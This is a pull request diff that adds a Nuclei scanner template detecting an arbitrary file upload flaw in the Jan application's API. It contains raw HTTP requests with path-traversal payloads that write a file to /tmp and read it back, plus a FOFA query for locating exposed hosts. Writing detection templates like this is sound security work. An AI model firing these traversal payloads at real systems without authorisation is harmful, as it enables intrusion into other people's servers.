Merge pull request #10327 from projectdiscovery/pussycat0x-patch-9

Create jan-api-lfi.yaml

http/vulnerabilities/other/jan-file-upload.yaml

@@ -0,0 +1,49 @@
+id: jan-file-upload
+
+info:
+  name: Jan - Arbitrary File Upload
+  author: pussycat0x
+  severity: high
+  description: |
+    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
+  reference:
+    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
+  metadata:
+    fofa-query: icon_hash="-165268926"
+    max-request: 2
+  tags: jan,intrusive,file-upload
+
+variables:
+  string: "{{to_lower(rand_base(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /v1/app/writeFileSync HTTP/1.1
+        Host: {{Hostname}}
+        contentType: application/json
+        Content-Type: text/plain;charset=UTF-8
+        Origin: {{RootURL}}
+
+        ["/../../../../../tmp/{{string}}.txt","{{randstr}}"]
+
+      - |
+        POST /v1/app/readFileSync HTTP/1.1
+        Host: {{Hostname}}
+        contentType: application/json
+        Content-Type: text/plain;charset=UTF-8
+        Origin: {{RootURL}}
+
+        ["file:/../../../../../tmp/{{string}}.txt","utf-8"]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '{{string}}'
+
+      - type: status
+        status:
+          - 200